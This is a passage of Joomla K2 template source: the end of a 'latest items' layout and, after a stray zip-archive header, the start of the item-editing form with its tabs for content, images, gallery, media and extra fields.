<div id="k2Container" class="latestView<?php if($this->params->get('pageclass_sfx')) echo ' '.$this->params->get('pageclass_sfx'); ?>">

	<?php if($this->params->get('show_page_title')): ?>
	<!-- Page title -->
	<div class="componentheading<?php echo $this->params->get('pageclass_sfx')?>">
		<?php echo $this->escape($this->params->get('page_title')); ?>
	</div>
	<?php endif; ?>

	<?php foreach($this->blocks as $key=>$block): ?>
	<div class="latestItemsContainer" style="width:<?php echo number_format(100/$this->params->get('latestItemsCols'), 1); ?>%;">

		<?php if($this->source=='categories'): $category=$block; ?>

		<?php if($this->params->get('categoryFeed') || $this->params->get('categoryImage') || $this->params->get('categoryTitle') || $this->params->get('categoryDescription')): ?>
		<!-- Start K2 Category block -->
		<div class="latestItemsCategory">
			<?php if($this->params->get('categoryFeed')): ?>
			<!-- RSS feed icon -->
			<div class="k2FeedIcon">
				<a href="<?php echo $category->feed; ?>" title="<?php echo JText::_('K2_SUBSCRIBE_TO_THIS_RSS_FEED'); ?>">
					<span><?php echo JText::_('K2_SUBSCRIBE_TO_THIS_RSS_FEED'); ?></span>
				</a>
				<div class="clr"></div>
			</div>
			<?php endif; ?>

			<?php if ($this->params->get('categoryImage') && !empty($category->image)): ?>
			<div class="latestItemsCategoryImage">
				<img src="<?php echo $category->image; ?>" alt="<?php echo K2HelperUtilities::cleanHtml($category->name); ?>" style="width:<?php echo $this->params->get('catImageWidth'); ?>px;height:auto;" />
			</div>
			<?php endif; ?>

			<?php if ($this->params->get('categoryTitle')): ?>
			<h2><a href="<?php echo $category->link; ?>"><?php echo $category->name; ?></a></h2>
			<?php endif; ?>

			<?php if ($this->params->get('categoryDescription') && isset($category->description)): ?>
			<p><?php echo $category->description; ?></p>
			<?php endif; ?>

			<div class="clr"></div>

			<!-- K2 Plugins: K2CategoryDisplay -->
			<?php echo $category->event->K2CategoryDisplay; ?>
			<div class="clr"></div>
		</div>
		<!-- End K2 Category block -->
		<?php endif; ?>

		<?php else: $user=$block; ?>

		<?php if ($this->params->get('userFeed') || $this->params->get('userImage') || $this->params->get('userName') || $this->params->get('userDescription') || $this->params->get('userURL') || $this->params->get('userEmail')): ?>
		<!-- Start K2 User block -->
		<div class="latestItemsUser">

			<?php if($this->params->get('userFeed')): ?>
			<!-- RSS feed icon -->
			<div class="k2FeedIcon">
				<a href="<?php echo $user->feed; ?>" title="<?php echo JText::_('K2_SUBSCRIBE_TO_THIS_RSS_FEED'); ?>">
					<span><?php echo JText::_('K2_SUBSCRIBE_TO_THIS_RSS_FEED'); ?></span>
				</a>
				<div class="clr"></div>
			</div>
			<?php endif; ?>

			<?php if ($this->params->get('userImage') && !empty($user->avatar)): ?>
			<img src="<?php echo $user->avatar; ?>" alt="<?php echo $user->name; ?>" style="width:<?php echo $this->params->get('userImageWidth'); ?>px;height:auto;" />
			<?php endif; ?>

			<?php if ($this->params->get('userName')): ?>
			<h2><a rel="author" href="<?php echo $user->link; ?>"><?php echo $user->name; ?></a></h2>
			<?php endif; ?>

			<?php if ($this->params->get('userDescription') && isset($user->profile->description)): ?>
			<p class="latestItemsUserDescription"><?php echo $user->profile->description; ?></p>
			<?php endif; ?>

			<?php if ($this->params->get('userURL') || $this->params->get('userEmail')): ?>
			<p class="latestItemsUserAdditionalInfo">
				<?php if ($this->params->get('userURL') && isset($user->profile->url)): ?>
				<span class="latestItemsUserURL">
					<?php echo JText::_('K2_WEBSITE_URL'); ?>: <a rel="me" href="<?php echo $user->profile->url; ?>" target="_blank"><?php echo $user->profile->url; ?></a>
				</span>
				<?php endif; ?>

				<?php if ($this->params->get('userEmail')): ?>
				<span class="latestItemsUserEmail">
					<?php echo JText::_('K2_EMAIL'); ?>: <?php echo JHTML::_('Email.cloak', $user->email); ?>
				</span>
				<?php endif; ?>
			</p>
			<?php endif; ?>

			<div class="clr"></div>

			<?php echo $user->event->K2UserDisplay; ?>

			<div class="clr"></div>
		</div>
		<!-- End K2 User block -->
		<?php endif; ?>

		<?php endif; ?>

		<!-- Start Items list -->
		<div class="latestItemList">
			<?php if($this->params->get('latestItemsDisplayEffect')=="first"): ?>

			<?php foreach ($block->items as $itemCounter=>$item): K2HelperUtilities::setDefaultImage($item, 'latest', $this->params); ?>
			<?php if($itemCounter==0): ?>
			<?php $this->item=$item; echo $this->loadTemplate('item'); ?>
			<?php else: ?>
			<h2 class="latestItemTitleList">
				<?php if ($item->params->get('latestItemTitleLinked')): ?>
				<a href="<?php echo $item->link; ?>"><?php echo $item->title; ?></a>
				<?php else: ?>
				<?php echo $item->title; ?>
				<?php endif; ?>
			</h2>
			<?php endif; ?>
			<?php endforeach; ?>

			<?php else: ?>

			<?php foreach ($block->items as $item): K2HelperUtilities::setDefaultImage($item, 'latest', $this->params); ?>
			<?php $this->item=$item; echo $this->loadTemplate('item'); ?>
			<?php endforeach; ?>

			<?php endif; ?>
		</div>
		<!-- End Item list -->

	</div>

	<?php if(($key+1)%($this->params->get('latestItemsCols'))==0): ?>
	<div class="clr"></div>
	<?php endif; ?>

	<?php endforeach; ?>
	<div class="clr"></div>
</div>

<!-- End K2 Latest Layout -->
PK!
���~�~�1bizone/html/com_k2/templates/default/itemform.phpnu&1i�<?php
/**
 * @version    2.7.x
 * @package    K2
 * @author     JoomlaWorks http://www.joomlaworks.net
 * @copyright  Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved.
 * @license    GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

$document = JFactory::getDocument();
$document->addScriptDeclaration("
	Joomla.submitbutton = function(pressbutton){
		if (pressbutton == 'cancel') {
			submitform( pressbutton );
			return;
		}
		if (\$K2.trim(\$K2('#title').val()) == '') {
			alert( '".JText::_('K2_ITEM_MUST_HAVE_A_TITLE', true)."' );
		}
		else if (\$K2.trim(\$K2('#catid').val()) == '0') {
			alert( '".JText::_('K2_PLEASE_SELECT_A_CATEGORY', true)."' );
		}
		else {
			syncExtraFieldsEditor();
			var validation = validateExtraFields();
			if(validation === true) {
				\$K2('#selectedTags option').attr('selected', 'selected');
				submitform( pressbutton );
			}
		}
	};
");

?>

<form action="<?php echo JURI::root(true); ?>/index.php" enctype="multipart/form-data" method="post" name="adminForm" id="adminForm">
	<?php if($this->mainframe->isSite()): ?>
	<div id="k2FrontendContainer" class="isJ<?php echo K2_JVERSION; ?>">
		<div id="k2Frontend">
			<table class="k2FrontendToolbar" cellpadding="2" cellspacing="4">
				<tr>
					<td id="toolbar-save" class="button">
						<a class="toolbar" href="#" onclick="Joomla.submitbutton('save'); return false;">
							<span title="<?php echo JText::_('K2_SAVE'); ?>" class="icon-32-save icon-save"></span> <?php echo JText::_('K2_SAVE'); ?>
						</a>
					</td>
					<td id="toolbar-cancel" class="button">
						<a class="toolbar" href="#">
							<span title="<?php echo JText::_('K2_CANCEL'); ?>" class="icon-32-cancel icon-cancel"></span> <?php echo JText::_('K2_CLOSE'); ?>
						</a>
					</td>
				</tr>
			</table>

			<div id="k2FrontendEditToolbar">
				<h2 class="header icon-48-k2">
					<?php echo (JRequest::getInt('cid')) ? JText::_('K2_EDIT_ITEM') : JText::_('K2_ADD_ITEM'); ?>
				</h2>
			</div>

			<div class="clr"></div>

			<div id="k2FrontendPermissionsNotice">
				<p><i class="icon-info"></i> <?php echo $this->permissionsMessage; ?></p>
			</div>
			<?php endif; ?>

			<div id="k2ToggleSidebarContainer">
				<a href="#" id="k2ToggleSidebar"><?php echo JText::_('K2_TOGGLE_SIDEBAR'); ?></a>
			</div>

			<table cellspacing="0" cellpadding="0" border="0" class="adminFormK2Container table">
				<tbody>
					<tr>
						<td id="adminFormK2tabs">
							<table class="adminFormK2">
								<tr>
									<td class="adminK2LeftCol">
										<label for="title"><?php echo JText::_('K2_TITLE'); ?></label>
									</td>
									<td class="adminK2RightCol">
										<input class="text_area k2TitleBox" type="text" name="title" id="title" maxlength="250" value="<?php echo $this->row->title; ?>" />
									</td>
								</tr>
								<tr>
									<td class="adminK2LeftCol">
										<label for="alias"><?php echo JText::_('K2_TITLE_ALIAS'); ?></label>
									</td>
									<td class="adminK2RightCol">
										<input class="text_area k2TitleAliasBox" type="text" name="alias" id="alias" maxlength="250" value="<?php echo $this->row->alias; ?>" />
									</td>
								</tr>
								<tr>
									<td class="adminK2LeftCol">
										<label><?php echo JText::_('K2_CATEGORY'); ?></label>
									</td>
									<td class="adminK2RightCol">
										<?php echo $this->lists['categories']; ?>
									</td>
								</tr>
								<tr>
									<td class="adminK2LeftCol">
										<label><?php echo JText::_('K2_TAGS'); ?></label>
									</td>
									<td class="adminK2RightCol">
										<?php if($this->params->get('taggingSystem')): ?>
										<!-- Free tagging -->
										<ul class="tags">
											<?php if(isset($this->row->tags) && count($this->row->tags)): ?>
											<?php foreach($this->row->tags as $tag): ?>
											<li class="tagAdded">
												<?php echo $tag->name; ?>
												<span title="<?php echo JText::_('K2_CLICK_TO_REMOVE_TAG'); ?>" class="tagRemove">x</span>
												<input type="hidden" name="tags[]" value="<?php echo $tag->name; ?>" />
											</li>
											<?php endforeach; ?>
											<?php endif; ?>
											<li class="tagAdd">
												<input type="text" id="search-field" />
											</li>
											<li class="clr"></li>
										</ul>
										<span class="k2Note"> <?php echo JText::_('K2_WRITE_A_TAG_AND_PRESS_RETURN_OR_COMMA_TO_ADD_IT'); ?> </span>
										<?php else: ?>
										<!-- Selection based tagging -->
										<?php if( !$this->params->get('lockTags') || $this->user->gid>23): ?>
										<div style="float:left;">
											<input type="text" name="tag" id="tag" />
											<input type="button" id="newTagButton" value="<?php echo JText::_('K2_ADD'); ?>" />
										</div>
										<div id="tagsLog"></div>
										<div class="clr"></div>
										<span class="k2Note"> <?php echo JText::_('K2_WRITE_A_TAG_AND_PRESS_ADD_TO_INSERT_IT_TO_THE_AVAILABLE_TAGS_LISTNEW_TAGS_ARE_APPENDED_AT_THE_BOTTOM_OF_THE_AVAILABLE_TAGS_LIST_LEFT'); ?> </span>
										<?php endif; ?>
										<table cellspacing="0" cellpadding="0" border="0" id="tagLists">
											<tr>
												<td id="tagListsLeft">
													<span><?php echo JText::_('K2_AVAILABLE_TAGS'); ?></span> <?php echo $this->lists['tags'];	?>
												</td>
												<td id="tagListsButtons">
													<input type="button" id="addTagButton" value="<?php echo JText::_('K2_ADD'); ?> &raquo;" />
													<br />
													<br />
													<input type="button" id="removeTagButton" value="&laquo; <?php echo JText::_('K2_REMOVE'); ?>" />
												</td>
												<td id="tagListsRight">
													<span><?php echo JText::_('K2_SELECTED_TAGS'); ?></span> <?php echo $this->lists['selectedTags']; ?>
												</td>
											</tr>
										</table>
										<?php endif; ?>
									</td>
								</tr>
								<?php if($this->mainframe->isAdmin() || ($this->mainframe->isSite() && $this->permissions->get('publish')  || ($this->permissions->get('editPublished') && $this->row->id && $this->row->published)  )): ?>
								<?php if($this->permissions->get('publish')): ?>
								<tr>
									<td class="adminK2LeftCol">
										<label for="featured"><?php echo JText::_('K2_IS_IT_FEATURED'); ?></label>
									</td>
									<td class="adminK2RightCol">
										<?php echo $this->lists['featured']; ?>
									</td>
								</tr>
								<?php endif; ?>
								<tr>
									<td class="adminK2LeftCol">
										<label><?php echo JText::_('K2_PUBLISHED'); ?></label>
									</td>
									<td class="adminK2RightCol">
										<?php echo $this->lists['published']; ?>
									</td>
								</tr>
								<?php endif; ?>
							</table>

							<!-- Required extra field warning -->
							<div id="k2ExtraFieldsValidationResults">
								<h3><?php echo JText::_('K2_THE_FOLLOWING_FIELDS_ARE_REQUIRED'); ?></h3>
								<ul id="k2ExtraFieldsMissing">
									<li><?php echo JText::_('K2_LOADING'); ?></li>
								</ul>
							</div>

							<!-- Tabs start here -->
							<div class="k2Tabs" id="k2Tabs">
								<ul class="k2TabsNavigation">
									<li id="tabContent"><a href="#k2Tab1"><?php echo JText::_('K2_CONTENT'); ?></a></li>
									<?php if ($this->params->get('showImageTab')): ?>
									<li id="tabImage"><a href="#k2Tab2"><?php echo JText::_('K2_IMAGE'); ?></a></li>
									<?php endif; ?>
									<?php if ($this->params->get('showImageGalleryTab')): ?>
									<li id="tabImageGallery"><a href="#k2Tab3"><?php echo JText::_('K2_IMAGE_GALLERY'); ?></a></li>
									<?php endif; ?>
									<?php if ($this->params->get('showVideoTab')): ?>
									<li id="tabVideo"><a href="#k2Tab4"><?php echo JText::_('K2_MEDIA'); ?></a></li>
									<?php endif; ?>
									<?php if ($this->params->get('showExtraFieldsTab')): ?>
									<li id="tabExtraFields"><a href="#k2Tab5"><?php echo JText::_('K2_EXTRA_FIELDS'); ?></a></li>
									<?php endif; ?>
									<?php if ($this->params->get('showAttachmentsTab')): ?>
									<li id="tabAttachments"><a href="#k2Tab6"><?php echo JText::_('K2_ATTACHMENTS'); ?></a></li>
									<?php endif; ?>
									<?php if(count(array_filter($this->K2PluginsItemOther)) && $this->params->get('showK2Plugins')): ?>
									<li id="tabPlugins"><a href="#k2Tab7"><?php echo JText::_('K2_PLUGINS'); ?></a></li>
									<?php endif; ?>
								</ul>

								<!-- Tab content -->
								<div class="k2TabsContent" id="k2Tab1">
									<?php if($this->params->get('mergeEditors')): ?>
									<div class="k2ItemFormEditor"> <?php echo $this->text; ?>
										<div class="dummyHeight"></div>
										<div class="clr"></div>
									</div>
									<?php else: ?>
									<div class="k2ItemFormEditor"> <span class="k2ItemFormEditorTitle"> <?php echo JText::_('K2_INTROTEXT_TEASER_CONTENTEXCERPT'); ?> </span> <?php echo $this->introtext; ?>
										<div class="dummyHeight"></div>
										<div class="clr"></div>
									</div>
									<div class="k2ItemFormEditor"> <span class="k2ItemFormEditorTitle"> <?php echo JText::_('K2_FULLTEXT_MAIN_CONTENT'); ?> </span> <?php echo $this->fulltext; ?>
										<div class="dummyHeight"></div>
										<div class="clr"></div>
									</div>
									<?php endif; ?>
									<?php if (count($this->K2PluginsItemContent)): ?>
									<div class="itemPlugins">
										<?php foreach($this->K2PluginsItemContent as $K2Plugin): ?>
										<?php if(!is_null($K2Plugin)): ?>
										<fieldset>
											<legend><?php echo $K2Plugin->name; ?></legend>
											<?php echo $K2Plugin->fields; ?>
										</fieldset>
										<?php endif; ?>
										<?php endforeach; ?>
									</div>
									<?php endif; ?>
									<div class="clr"></div>
								</div>
								<?php if ($this->params->get('showImageTab')): ?>
								<!-- Tab image -->
								<div class="k2TabsContent" id="k2Tab2">
									<table class="admintable">
										<tr>
											<td align="right" class="key">
												<?php echo JText::_('K2_ITEM_IMAGE'); ?>
											</td>
											<td>
												<input type="file" name="image" class="fileUpload" />
												<i>(<?php echo JText::_('K2_MAX_UPLOAD_SIZE'); ?>: <?php echo ini_get('upload_max_filesize'); ?>)</i>
												<br />
												<br />
												<input type="text" name="existingImage" id="existingImageValue" class="text_area" readonly />
												<input type="button" value="<?php echo JText::_('K2_BROWSE_SERVER'); ?>" id="k2ImageBrowseServer"  />
												<br />
												<br />
											</td>
										</tr>
										<tr>
											<td align="right" class="key">
												<?php echo JText::_('K2_ITEM_IMAGE_CAPTION'); ?>
											</td>
											<td>
												<input type="text" name="image_caption" size="30" class="text_area" value="<?php echo $this->row->image_caption; ?>" />
											</td>
										</tr>
										<tr>
											<td align="right" class="key">
												<?php echo JText::_('K2_ITEM_IMAGE_CREDITS'); ?>
											</td>
											<td>
												<input type="text" name="image_credits" size="30" class="text_area" value="<?php echo $this->row->image_credits; ?>" />
											</td>
										</tr>
										<?php if (!empty($this->row->image)): ?>
										<tr>
											<td align="right" class="key">
												<?php echo JText::_('K2_ITEM_IMAGE_PREVIEW'); ?>
											</td>
											<td>
												<a class="modal" rel="{handler: 'image'}" href="<?php echo $this->row->image; ?>" title="<?php echo JText::_('K2_CLICK_ON_IMAGE_TO_PREVIEW_IN_ORIGINAL_SIZE'); ?>">
													<img alt="<?php echo $this->row->title; ?>" src="<?php echo $this->row->thumb; ?>" class="k2AdminImage" />
												</a>
												<input type="checkbox" name="del_image" id="del_image" />
												<label for="del_image"><?php echo JText::_('K2_CHECK_THIS_BOX_TO_DELETE_CURRENT_IMAGE_OR_JUST_UPLOAD_A_NEW_IMAGE_TO_REPLACE_THE_EXISTING_ONE'); ?></label>
											</td>
										</tr>
										<?php endif; ?>
									</table>
									<?php if (count($this->K2PluginsItemImage)): ?>
									<div class="itemPlugins">
										<?php foreach($this->K2PluginsItemImage as $K2Plugin): ?>
										<?php if(!is_null($K2Plugin)): ?>
										<fieldset>
											<legend><?php echo $K2Plugin->name; ?></legend>
											<?php echo $K2Plugin->fields; ?>
										</fieldset>
										<?php endif; ?>
										<?php endforeach; ?>
									</div>
									<?php endif; ?>
								</div>
								<?php endif; ?>
								<?php if ($this->params->get('showImageGalleryTab')): ?>
								<!-- Tab image gallery -->
								<div class="k2TabsContent" id="k2Tab3">
									<?php if ($this->lists['checkSIG']): ?>
									<table class="admintable table" id="item_gallery_content">
										<tr>
											<td align="right" valign="top" class="key">
												<?php echo JText::_('K2_COM_BE_ITEM_ITEM_IMAGE_GALLERY'); ?>
											</td>
											<td valign="top">
												<?php if($this->sigPro): ?>
												<a class="modal" rel="{handler: 'iframe', size: {x: 940, y: 560}}" href="index.php?option=com_sigpro&view=galleries&task=create&newFolder=<?php echo $this->sigProFolder; ?>&type=k2&tmpl=component&template=system"><?php echo JText::_('K2_COM_BE_ITEM_SIGPRO_UPLOAD'); ?></a> <i>(<?php echo JText::_('K2_COM_BE_ITEM_SIGPRO_UPLOAD_NOTE'); ?>)</i>
												<input name="sigProFolder" type="hidden" value="<?php echo $this->sigProFolder; ?>" />
												<br />
												<br />
												<?php echo JText::_('K2_OR'); ?>
												<?php endif; ?>
												<?php echo JText::_('K2_UPLOAD_A_ZIP_FILE_WITH_IMAGES'); ?> <input type="file" name="gallery" class="fileUpload" /> <span class="hasTip k2GalleryNotice" title="<?php echo JText::_('K2_UPLOAD_A_ZIP_FILE_HELP_HEADER'); ?>::<?php echo JText::_('K2_UPLOAD_A_ZIP_FILE_HELP_TEXT'); ?>"><?php echo JText::_('K2_UPLOAD_A_ZIP_FILE_HELP'); ?></span> <i>(<?php echo JText::_('K2_MAX_UPLOAD_SIZE'); ?>: <?php echo ini_get('upload_max_filesize'); ?>)</i>
												<br />
												<br />
												<?php echo JText::_('K2_OR_ENTER_A_FLICKR_SET_URL'); ?><?php echo JText::_('K2_OR_ENTER_A_FLICKR_SET_URL'); ?>
												<input type="text" name="flickrGallery" size="50" value="<?php echo ($this->row->galleryType == 'flickr') ? $this->row->galleryValue : ''; ?>" /> <span class="hasTip k2GalleryNotice" title="<?php echo JText::_('K2_VALID_FLICK_API_KEY_HELP_HEADER'); ?>::<?php echo JText::_('K2_VALID_FLICK_API_KEY_HELP_TEXT'); ?>"><?php echo JText::_('K2_UPLOAD_A_ZIP_FILE_HELP'); ?></span>

												<?php if (!empty($this->row->gallery)): ?>
												<!-- Preview -->
												<div id="itemGallery">
													<?php echo $this->row->gallery; ?>
													<br />
													<input type="checkbox" name="del_gallery" id="del_gallery" />
													<label for="del_gallery"><?php echo JText::_('K2_CHECK_THIS_BOX_TO_DELETE_CURRENT_IMAGE_GALLERY_OR_JUST_UPLOAD_A_NEW_IMAGE_GALLERY_TO_REPLACE_THE_EXISTING_ONE'); ?></label>
												</div>
												<?php endif; ?>
											</td>
										</tr>
									</table>
									<?php else: ?>
										<?php if (K2_JVERSION == '15'): ?>
										<dl id="system-message">
											<dt class="notice"><?php echo JText::_('K2_NOTICE'); ?></dt>
											<dd class="notice message fade">
												<ul>
													<li><?php echo JText::_('K2_NOTICE_PLEASE_INSTALL_JOOMLAWORKS_SIMPLE_IMAGE_GALLERY_PRO_PLUGIN_IF_YOU_WANT_TO_USE_THE_IMAGE_GALLERY_FEATURES_OF_K2'); ?></li>
												</ul>
											</dd>
										</dl>
										<?php elseif(K2_JVERSION == '25'): ?>
										<div id="system-message-container">
											<dl id="system-message">
												<dt class="notice"><?php echo JText::_('K2_NOTICE'); ?></dt>
												<dd class="notice message">
													<ul>
														<li><?php echo JText::_('K2_NOTICE_PLEASE_INSTALL_JOOMLAWORKS_SIMPLE_IMAGE_GALLERY_PRO_PLUGIN_IF_YOU_WANT_TO_USE_THE_IMAGE_GALLERY_FEATURES_OF_K2'); ?></li>
													</ul>
												</dd>
											</dl>
										</div>
										<?php else: ?>
										<div class="alert">
											<h4 class="alert-heading"><?php echo JText::_('K2_NOTICE'); ?></h4>
											<div><p><?php echo JText::_('K2_NOTICE_PLEASE_INSTALL_JOOMLAWORKS_SIMPLE_IMAGE_GALLERY_PRO_PLUGIN_IF_YOU_WANT_TO_USE_THE_IMAGE_GALLERY_FEATURES_OF_K2'); ?></p></div>
										</div>
										<?php endif; ?>
									<?php endif; ?>
									<?php if (count($this->K2PluginsItemGallery)): ?>
									<div class="itemPlugins">
										<?php foreach($this->K2PluginsItemGallery as $K2Plugin): ?>
										<?php if(!is_null($K2Plugin)): ?>
										<fieldset>
											<legend><?php echo $K2Plugin->name; ?></legend>
											<?php echo $K2Plugin->fields; ?>
										</fieldset>
										<?php endif; ?>
										<?php endforeach; ?>
									</div>
									<?php endif; ?>
								</div>
								<?php endif; ?>
								<?php if ($this->params->get('showVideoTab')): ?>
								<!-- Tab video -->
								<div class="k2TabsContent" id="k2Tab4">
									<?php if ($this->lists['checkAllVideos']): ?>
									<table class="admintable" id="item_video_content">
										<tr>
											<td align="right" class="key">
												<?php echo JText::_('K2_MEDIA_SOURCE'); ?>
											</td>
											<td>
												<div id="k2VideoTabs" class="k2Tabs">
													<ul class="k2TabsNavigation">
														<li><a href="#k2VideoTab1"><?php echo JText::_('K2_UPLOAD'); ?></a></li>
														<li><a href="#k2VideoTab2"><?php echo JText::_('K2_BROWSE_SERVERUSE_REMOTE_MEDIA'); ?></a></li>
														<li><a href="#k2VideoTab3"><?php echo JText::_('K2_MEDIA_USE_ONLINE_VIDEO_SERVICE'); ?></a></li>
														<li><a href="#k2VideoTab4"><?php echo JText::_('K2_EMBED'); ?></a></li>
													</ul>
													<div id="k2VideoTab1" class="k2TabsContent">
														<div class="panel" id="Upload_video">
															<input type="file" name="video" class="fileUpload" />
															<i>(<?php echo JText::_('K2_MAX_UPLOAD_SIZE'); ?>: <?php echo ini_get('upload_max_filesize'); ?>)</i> </div>
													</div>
													<div id="k2VideoTab2" class="k2TabsContent">
														<div class="panel" id="Remote_video"> <a id="k2MediaBrowseServer" href="index.php?option=com_k2&view=media&type=video&tmpl=component&fieldID=remoteVideo"><?php echo JText::_('K2_BROWSE_VIDEOS_ON_SERVER')?></a> <?php echo JText::_('K2_OR'); ?> <?php echo JText::_('K2_PASTE_REMOTE_VIDEO_URL'); ?>
															<br />
															<br />
															<input type="text" size="50" name="remoteVideo" id="remoteVideo" value="<?php echo $this->lists['remoteVideo'] ?>" />
														</div>
													</div>
													<div id="k2VideoTab3" class="k2TabsContent">
														<div class="panel" id="Video_from_provider"> <?php echo JText::_('K2_SELECT_VIDEO_PROVIDER'); ?> <?php echo $this->lists['providers']; ?> <br/><br/> <?php echo JText::_('K2_AND_ENTER_VIDEO_ID'); ?>
															<input type="text" size="50" name="videoID" value="<?php echo $this->lists['providerVideo'] ?>" />
															<br />
															<br />
															<a class="modal" rel="{handler: 'iframe', size: {x: 990, y: 600}}" href="http://www.joomlaworks.net/allvideos-documentation"><?php echo JText::_('K2_READ_THE_ALLVIDEOS_DOCUMENTATION_FOR_MORE'); ?></a> </div>
													</div>
													<div id="k2VideoTab4" class="k2TabsContent">
														<div class="panel" id="embedVideo">
															<?php echo JText::_('K2_PASTE_HTML_EMBED_CODE_BELOW'); ?>
															<br />
															<textarea name="embedVideo" rows="5" cols="50" class="textarea"><?php echo $this->lists['embedVideo']; ?></textarea>
														</div>
													</div>
												</div>
											</td>
										</tr>
										<tr>
											<td align="right" class="key">
												<?php echo JText::_('K2_MEDIA_CAPTION'); ?>
											</td>
											<td>
												<input type="text" name="video_caption" size="50" class="text_area" value="<?php echo $this->row->video_caption; ?>" />
											</td>
										</tr>
										<tr>
											<td align="right" class="key">
												<?php echo JText::_('K2_MEDIA_CREDITS'); ?>
											</td>
											<td>
												<input type="text" name="video_credits" size="50" class="text_area" value="<?php echo $this->row->video_credits; ?>" />
											</td>
										</tr>
										<?php if($this->row->video): ?>
										<tr>
											<td align="right" class="key">
												<?php echo JText::_('K2_MEDIA_PREVIEW'); ?>
											</td>
											<td>
												<?php echo $this->row->video; ?>
												<br />
												<input type="checkbox" name="del_video" id="del_video" />
												<label for="del_video"><?php echo JText::_('K2_CHECK_THIS_BOX_TO_DELETE_CURRENT_VIDEO_OR_USE_THE_FORM_ABOVE_TO_REPLACE_THE_EXISTING_ONE'); ?></label>
											</td>
										</tr>
										<?php endif; ?>
									</table>
									<?php else: ?>
										<?php if (K2_JVERSION == '15'): ?>
										<dl id="system-message">
											<dt class="notice"><?php echo JText::_('K2_NOTICE'); ?></dt>
											<dd class="notice message fade">
												<ul>
													<li><?php echo JText::_('K2_NOTICE_PLEASE_INSTALL_JOOMLAWORKS_ALLVIDEOS_PLUGIN_IF_YOU_WANT_TO_USE_THE_FULL_VIDEO_FEATURES_OF_K2'); ?></li>
												</ul>
											</dd>
										</dl>
										<?php elseif(K2_JVERSION == '25'): ?>
										<div id="system-message-container">
											<dl id="system-message">
												<dt class="notice"><?php echo JText::_('K2_NOTICE'); ?></dt>
												<dd class="notice message">
													<ul>
														<li><?php echo JText::_('K2_NOTICE_PLEASE_INSTALL_JOOMLAWORKS_ALLVIDEOS_PLUGIN_IF_YOU_WANT_TO_USE_THE_FULL_VIDEO_FEATURES_OF_K2'); ?></li>
													</ul>
												</dd>
											</dl>
										</div>
										<?php else: ?>
										<div class="alert">
											<h4 class="alert-heading"><?php echo JText::_('K2_NOTICE'); ?></h4>
											<div><p><?php echo JText::_('K2_NOTICE_PLEASE_INSTALL_JOOMLAWORKS_ALLVIDEOS_PLUGIN_IF_YOU_WANT_TO_USE_THE_FULL_VIDEO_FEATURES_OF_K2'); ?></p></div>
										</div>
										<?php endif; ?>
									<table class="admintable" id="item_video_content">
										<tr>
											<td align="right" class="key">
												<?php echo JText::_('K2_MEDIA_SOURCE'); ?>
											</td>
											<td>
												<div id="k2VideoTabs" class="k2Tabs">
													<ul class="k2TabsNavigation">
														<li><a href="#k2VideoTab4"><?php echo JText::_('K2_EMBED'); ?></a></li>
													</ul>
													<div class="k2TabsContent" id="k2VideoTab4">
														<div class="panel" id="embedVideo">
															<?php echo JText::_('K2_PASTE_HTML_EMBED_CODE_BELOW'); ?>
															<br />
															<textarea name="embedVideo" rows="5" cols="50" class="textarea"><?php echo $this->lists['embedVideo']; ?></textarea>
														</div>
													</div>
												</div>
											</td>
										</tr>
										<tr>
											<td align="right" class="key">
												<?php echo JText::_('K2_MEDIA_CAPTION'); ?>
											</td>
											<td>
												<input type="text" name="video_caption" size="50" class="text_area" value="<?php echo $this->row->video_caption; ?>" />
											</td>
										</tr>
										<tr>
											<td align="right" class="key">
												<?php echo JText::_('K2_MEDIA_CREDITS'); ?>
											</td>
											<td>
												<input type="text" name="video_credits" size="50" class="text_area" value="<?php echo $this->row->video_credits; ?>" />
											</td>
										</tr>
										<?php if($this->row->video): ?>
										<tr>
											<td align="right" class="key">
												<?php echo JText::_('K2_MEDIA_PREVIEW'); ?>
											</td>
											<td>
												<?php echo $this->row->video; ?>
												<br />
												<input type="checkbox" name="del_video" id="del_video" />
												<label for="del_video"><?php echo JText::_('K2_USE_THE_FORM_ABOVE_TO_REPLACE_THE_EXISTING_VIDEO_OR_CHECK_THIS_BOX_TO_DELETE_CURRENT_VIDEO'); ?></label>
											</td>
										</tr>
										<?php endif; ?>
									</table>
									<?php endif; ?>
									<?php if (count($this->K2PluginsItemVideo)): ?>
									<div class="itemPlugins">
										<?php foreach($this->K2PluginsItemVideo as $K2Plugin): ?>
										<?php if(!is_null($K2Plugin)): ?>
										<fieldset>
											<legend><?php echo $K2Plugin->name; ?></legend>
											<?php echo $K2Plugin->fields; ?>
										</fieldset>
										<?php endif; ?>
										<?php endforeach; ?>
									</div>
									<?php endif; ?>
								</div>
								<?php endif; ?>
								<?php if ($this->params->get('showExtraFieldsTab')): ?>
								<!-- Tab extra fields -->
								<div class="k2TabsContent" id="k2Tab5">
									<div id="extraFieldsContainer">
										<?php if (count($this->extraFields)): ?>
										<table class="admintable" id="extraFields">
											<?php foreach($this->extraFields as $extraField): ?>
											<?php if($extraField->type == 'header'): ?>
											<tr>
												<td colspan="2" ><h4 class="k2ExtraFieldHeader"><?php echo $extraField->name; ?></h4></td>
											</tr>
											<?php else: ?>
											<tr>
												<td align="right" class="key">
													<label for="K2ExtraField_<?php echo $extraField->id; ?>"><?php echo $extraField->name; ?></label>
												</td>
												<td>
													<?php echo $extraField->element; ?>
												</td>
											</tr>
											<?php endif; ?>
											<?php endforeach; ?>
										</table>
										<?php else: ?>
											<?php if (K2_JVERSION == '15'): ?>
												<dl id="system-message">
													<dt class="notice"><?php echo JText::_('K2_NOTICE'); ?></dt>
													<dd class="notice message fade">
														<ul>
															<li><?php echo JText::_('K2_PLEASE_SELECT_A_CATEGORY_FIRST_TO_RETRIEVE_ITS_RELATED_EXTRA_FIELDS'); ?></li>
														</ul>
													</dd>
												</dl>
											<?php elseif (K2_JVERSION == '25'): ?>
											<div id="system-message-container">
												<dl id="system-message">
													<dt class="notice"><?php echo JText::_('K2_NOTICE'); ?></dt>
													<dd class="notice message">
														<ul>
															<li><?php echo JText::_('K2_PLEASE_SELECT_A_CATEGORY_FIRST_TO_RETRIEVE_ITS_RELATED_EXTRA_FIELDS'); ?></li>
														</ul>
													</dd>
												</dl>
											</div>
											<?php else: ?>
											<div class="alert">
												<h4 class="alert-heading"><?php echo JText::_('K2_NOTICE'); ?></h4>
												<div>
